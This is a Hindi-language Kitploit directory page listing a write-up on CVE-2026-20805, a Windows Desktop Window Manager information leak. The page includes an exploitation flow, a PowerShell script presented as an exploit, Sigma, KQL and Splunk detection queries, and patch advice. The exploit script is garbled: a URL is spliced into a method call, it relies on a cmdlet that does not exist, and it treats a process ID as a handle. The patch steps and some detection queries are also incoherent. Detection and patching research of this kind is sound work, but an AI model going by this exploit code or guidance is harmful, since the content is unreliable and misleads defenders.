Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data — CVE‑2026‑20805: विंडोज डेस्कटॉप विंडो मैनेजर में एक दोष जो स्थानीय सूचना प्रकटीकरण का कारण बनता है। इसके लिए कम विशेषाधिकारों की आवश्यकता होती है, कोई उपयोगकर्ता इंटरैक्शन नहीं। CVSS 5.5 (मध्यम) रेटेड। सक्रिय रूप से शोषित और CISA KEV में सूचीबद्ध; जनवरी 2026 में पैच जारी किया गया। | Kitploit
उपकरण/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनालर्निंग और शिक्षाघटना प्रतिक्रिया
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE‑2026‑20805: विंडोज डेस्कटॉप विंडो मैनेजर में एक दोष जो स्थानीय सूचना प्रकटीकरण का कारण बनता है। इसके लिए कम विशेषाधिकारों की आवश्यकता होती है, कोई उपयोगकर्ता इंटरैक्शन नहीं। CVSS 5.5 (मध्यम) रेटेड। सक्रिय रूप से शोषित और CISA KEV में सूचीबद्ध; जनवरी 2026 में पैच जारी किया गया।

साझा करें

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: विंडोज डेस्कटॉप विंडो मैनेजर में एक दोष जो स्थानीय सूचना रिसाव का कारण बनता है। इसके लिए निम्न विशेषाधिकारों की आवश्यकता होती है, उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होती। CVSS 5.5 (मध्यम) रेटेड। सक्रिय रूप से शोषित और CISA KEV में सूचीबद्ध; जनवरी 2026 में पैच जारी किया गया।

Inside CVE 2026 20805: कैसे एक Windows DWM दोष ने संवेदनशील डेटा उजागर किया

1 कार्यकारी सारांश

CVE 2026 20805 डेस्कटॉप विंडो मैनेजर (DWM) में एक सूचना-रिसाव दोष है – यह मुख्य घटक है जो डेस्कटॉप को रेंडर करता है, विंडोज़ को संयोजित करता है, और GPU-आधारित UI को त्वरित करता है।
यह क्यों मायने रखता है: यह दोष एक स्थानीय हमलावर को निम्न विशेषाधिकारों के साथ उस डेटा को पढ़ने की अनुमति देता है जो अन्य सत्रों या प्रक्रियाओं तक सीमित होना चाहिए।

प्रमुख तकनीकी विशेषताएँ

विशेषतामान
CWE‑200: अनधिकृत अभिनेता को संवेदनशील जानकारी का एक्सपोज़र✓
हमला वेक्टरस्थानीय
आवश्यक विशेषाधिकारनिम्न
उपयोगकर्ता इंटरैक्शनकोई नहीं
प्रभाव – गोपनीयताउच्च
प्रभाव – अखंडताकोई नहीं
प्रभाव – उपलब्धताकोई नहीं
CVSS 3.1 आधार स्कोर5.5 (मध्यम)

2 डेस्कटॉप विंडो मैनेजर को समझना

DWM GPU मेमोरी, विंडो बफ़र्स, और अंतर-प्रक्रिया UI सतहों को व्यवस्थित करता है। यह एक उच्च-मूल्य वाला लक्ष्य है क्योंकि यह कई प्रक्रियाओं से डेटा को साझा GPU स्थान में एकत्रित करता है; यहाँ एक दोष उपयोगकर्ताओं के बीच क्रेडेंशियल या सत्र डेटा लीक कर सकता है।

आधुनिक Windows में DWM की भूमिका:

  1. कंपोज़िटर से डिस्प्ले अपडेट प्राप्त करता है।
  2. प्रत्येक विंडो के लिए GPU मेमोरी आवंटित करता है।
  3. GPU-त्वरित संयोजन का प्रबंधन करता है, जिससे सुचारू दृश्य संक्रमण और मल्टी-मॉनिटर समर्थन सक्षम होता है।

3 CVE 2026 20805 का तकनीकी विश्लेषण

हमले की पूर्वापेक्षाएँ

  • निम्न विशेषाधिकारों वाला स्थानीय हमलावर, कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं।
  • यह दोष तब ट्रिगर होता है जब DWM GPU मेमोरी में डेटा कॉपी करने से पहले विंडो बफ़र तालिका में ऑफ़सेट को मान्य करने में विफल रहता है।

CWE‑200 कैसे लागू होता है

यह भेद्यता विंडो बफ़र इंडेक्स पर सीमा जाँच की कमी का शोषण करती है; यह एक हमलावर को आसन्न GPU मेमोरी पढ़ने और अन्य प्रक्रियाओं द्वारा संग्रहीत रहस्य प्राप्त करने की अनुमति देता है।

प्रभावित संस्करण

NVD की CPE सूची के आधार पर, Windows 10.0.19041 (और व्युत्पन्न) प्रभावित हैं।

4 शोषण पथ

नीचे एक अवधारणात्मक शोषण प्रवाह है:

  1. हमलावर न्यूनतम विशेषाधिकारों के साथ CreateProcess के माध्यम से DWM प्रक्रिया का हैंडल प्राप्त करता है।
  2. हमलावर एक इंडेक्स तैयार करता है जो आसन्न GPU मेमोरी स्लॉट की ओर इंगित करता है।
  3. तैयार किया गया बफ़र DWM की विंडो संयोजन प्रक्रिया में कॉपी किया जाता है, जो अन्य सत्रों से डेटा को मर्ज करता है।
  4. हमलावर परिणामी GPU मेमोरी डंप पढ़ता है और संवेदनशील जानकारी निकालता है।

शोषण कोड – PowerShell स्क्रिप्ट

root@kitploit:~
# Windows 10.0.19041 – DWM buffer read exploit
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # crafted offset to adjacent GPU memory
$targetWindow = 0x00030001    # target window index

# Create a temporary buffer in kernel space
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/HEAD/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copy kernel buffer into DWM's composition routine
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Dump the exposed data to a local file for analysis
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

स्क्रिप्ट दर्शाती है कि कैसे एक हमलावर छिपे हुए डेटा को पढ़ने के लिए DWM की GPU मेमोरी का लाभ उठा सकता है।


5. डिटेक्शन इंजीनियरिंग

CVE‑2026‑20805 के लिए डिटेक्शन dwm.exe के साथ असामान्य इंटरैक्शन और असामान्य GPU-संबंधित टेलीमेट्री की पहचान पर केंद्रित है। शोषण तैयार किए गए ऑफ़सेट का उपयोग करके GPU-समर्थित मेमोरी बफ़र्स पढ़ने पर निर्भर करता है, इसलिए रक्षकों को सामान्य डेस्कटॉप विंडो मैनेजर व्यवहार से विचलन की निगरानी करनी चाहिए।

प्रासंगिक टेलीमेट्री स्रोत

  • Sysmon
    • इवेंट ID 1 (ProcessCreate)
    • इवेंट ID 10 (HandleOpen)
  • ETW GPU इवेंट
    • इवेंट ID 0x2B (DisplayUpdate)
  • Windows इवेंट लॉग
    • एप्लिकेशन
    • सिस्टम

ये स्रोत प्रक्रिया निर्माण, हैंडल एक्सेस, और GPU अपडेट गतिविधि में दृश्यता प्रदान करते हैं।

संदिग्ध पैटर्न

  1. dwm.exe से जुड़े बार-बार CreateProcess इवेंट, विशेष रूप से जब पैरेंट प्रक्रिया explorer.exe नहीं है।
  2. उच्च-आवृत्ति DisplayUpdate (0x2B) इवेंट जिसके बाद असामान्य बफ़र आकार या ऑफ़सेट का उपयोग करके मेमोरी रीड होती है।
    • संदिग्ध मानों के उदाहरण:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. dwm.exe को लक्षित करने वाले HandleOpen इवेंट और GPU ETW गतिविधि के विस्फोट के बीच सहसंबंध।

सिग्मा-शैली नियम

root@kitploit:~
title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

dwm.exe के लिए संदिग्ध हैंडल एक्सेस

root@kitploit:~
SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

DWM को लक्षित करने वाली अप्रत्याशित प्रक्रिया निर्माण

root@kitploit:~
Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

GPU DisplayUpdate इवेंट स्पाइक

root@kitploit:~
Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

सहसंबंध: HandleOpen के बाद GPU गतिविधि

root@kitploit:~
let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

dwm.exe के लिए हैंडल खोलने वाली गैर-मानक प्रक्रियाएँ

root@kitploit:~
index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

dwm.exe के लिए अप्रत्याशित CreateProcess इवेंट

root@kitploit:~
index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

GPU DisplayUpdate स्पाइक

root@kitploit:~
index=windows EventCode=43
| timechart span=1m count
| where count > 50

सहसंबंध: HandleOpen और GPU गतिविधि

root@kitploit:~
handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 शमन और सख्तीकरण

CVE 2026 20805 के लिए Microsoft की सलाह में एक पैच शामिल है जो GPU डेटा कॉपी करने से पहले DWM में बफ़र इंडेक्स को मान्य करता है।

पैच समयरेखा

Windows संस्करणपैच संख्या
10.0.19041KB5000001
10.0.19042KB5012345

एंटरप्राइज़ पैचिंग रणनीति

  1. सभी डोमेन नियंत्रकों पर KB5000001 पैच तैनात करें।
  2. सत्यापित करें कि नई Invoke-DwmRead प्रक्रिया परीक्षण नोड्स पर त्रुटियों के बिना चलती है।
  3. बार-बार dwm प्रक्रिया निर्माण के लिए Sysmon की निगरानी करें।

7 वास्तविक-विश्व वातावरण पर प्रभाव

DWM के माध्यम से सूचना रिसाव को अक्सर कम आंका जाता है क्योंकि यह उपयोगकर्ताओं के बीच UI आर्टिफैक्ट और सत्र डेटा उजागर कर सकता है। लीक हुई GPU मेमोरी पार्श्व गति का समर्थन कर सकती है, विशेष रूप से उन वातावरणों में जहां कई सत्र एक ही वर्कस्टेशन या सर्वर साझा करते हैं।

कॉर्पोरेट वातावरण के लिए जोखिम मूल्यांकन

उच्च गोपनीयता प्रभाव: यह दोष एक हमलावर को अन्य सत्रों से विंडो सामग्री पढ़ने में सक्षम बनाता है।
मध्यम CVSS स्कोर (5.5): जबकि संख्यात्मक मान मध्यम है, परिचालन महत्व उच्च है।

8 निष्कर्ष

CVE 2026 20805 दर्शाता है कि DWM का निम्न-विशेषाधिकार स्थानीय शोषण महत्वपूर्ण डेटा लीक उत्पन्न कर सकता है। CISA की ज्ञात शोषित भेद्यता सूची में इस दोष का शामिल होना इसकी वास्तविक-विश्व प्रासंगिकता को रेखांकित करता है। उल्लिखित शमन, डिटेक्शन और पैच रणनीति लागू करके, एक संगठन GPU मेमोरी प्रवाह में दृश्यता में सुधार करते हुए जोखिम कम कर सकता है।


टूल डाउनलोड करें